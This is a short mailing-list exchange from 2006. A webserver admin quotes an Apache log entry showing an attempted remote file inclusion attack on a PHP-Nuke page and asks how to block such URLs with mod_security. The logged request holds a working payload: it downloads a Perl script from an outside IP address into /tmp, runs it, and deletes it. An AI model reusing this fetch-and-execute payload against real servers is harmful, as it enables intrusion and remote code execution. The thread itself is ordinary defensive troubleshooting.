On 8/8/06, David Velayos <[EMAIL PROTECTED]> wrote:
of course, this is not working, (you have to be authenticated to use this
page as an admin user), but it's a useless waste of bandwidth and i think
it's better deny the access by a common security mechanism before. The
question is that
So, wit
of course, this is not working, (you have to be authenticated to use this page as an admin user), but it's a useless waste of bandwidth and i think it's better deny the access by a common security mechanism before. The question is that
So, with mod_security can i block supspicious urls with regexp
On 8/7/06, david <[EMAIL PROTECTED]> wrote:
Hello!
Recently, i've founded some entries on my apache webserver log like this:
[IP] - - [05/Aug/2006:02:17:47 +0200] "GET
/nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>
Hello!
Recently, i've founded some entries on my apache webserver log like this:
[IP] - - [05/Aug/2006:02:17:47 +0200] "GET
/nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*
